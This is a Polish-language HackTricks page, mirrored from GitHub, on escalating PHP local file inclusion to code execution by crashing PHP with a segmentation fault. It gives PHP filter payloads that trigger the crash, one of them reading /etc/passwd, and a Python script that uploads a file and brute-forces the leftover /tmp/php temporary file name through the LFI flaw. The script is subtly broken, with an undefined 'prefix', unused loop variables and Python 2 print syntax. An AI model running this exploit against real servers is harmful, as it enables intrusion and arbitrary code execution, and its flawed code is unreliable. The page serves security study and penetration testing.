mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-26 11:55:06 +00:00
87 lines
4.3 KiB
Markdown
87 lines
4.3 KiB
Markdown
|
# LFI2RCE poprzez błąd segmentacji
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Dowiedz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Dowiedz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wesprzyj HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
Zgodnie z writeupami [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (druga część) i [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), następujące ładunki spowodowały błąd segmentacji w PHP:
|
||
|
```php
|
||
|
// PHP 7.0
|
||
|
include("php://filter/string.strip_tags/resource=/etc/passwd");
|
||
|
|
||
|
// PHP 7.2
|
||
|
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
|
||
|
```
|
||
|
Powinieneś wiedzieć, że jeśli **wyślesz** żądanie **POST zawierające** **plik**, PHP utworzy **tymczasowy plik w `/tmp/php<something>`** z zawartością tego pliku. Ten plik zostanie **automatycznie usunięty** po przetworzeniu żądania.
|
||
|
|
||
|
Jeśli znajdziesz **LFI** i uda ci się **wywołać** błąd segmentacji w PHP, **tymczasowy plik nie zostanie usunięty**. Dlatego możesz go **szukać** wykorzystując podatność **LFI**, aż go znajdziesz i wykonasz arbitralny kod.
|
||
|
|
||
|
Możesz użyć obrazu dockera [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) do testów.
|
||
|
```python
|
||
|
# upload file with segmentation fault
|
||
|
import requests
|
||
|
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
|
||
|
files = {'file': open('la.php','rb')}
|
||
|
response = requests.post(url, files=files)
|
||
|
|
||
|
|
||
|
# Search for the file (improve this with threads)
|
||
|
import requests
|
||
|
import string
|
||
|
import threading
|
||
|
|
||
|
charset = string.ascii_letters + string.digits
|
||
|
|
||
|
host = "127.0.0.1"
|
||
|
port = 80
|
||
|
base_url = "http://%s:%d" % (host, port)
|
||
|
|
||
|
|
||
|
def bruteforce(charset):
|
||
|
for i in charset:
|
||
|
for j in charset:
|
||
|
for k in charset:
|
||
|
for l in charset:
|
||
|
for m in charset:
|
||
|
for n in charset:
|
||
|
filename = prefix + i + j + k
|
||
|
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
|
||
|
print url
|
||
|
response = requests.get(url)
|
||
|
if 'spyd3r' in response.content:
|
||
|
print "[+] Include success!"
|
||
|
return True
|
||
|
|
||
|
|
||
|
def main():
|
||
|
bruteforce(charset)
|
||
|
|
||
|
if __name__ == "__main__":
|
||
|
main()
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i praktykuj Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i praktykuj Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wesprzyj HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Udostępniaj sztuczki hakerskie, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|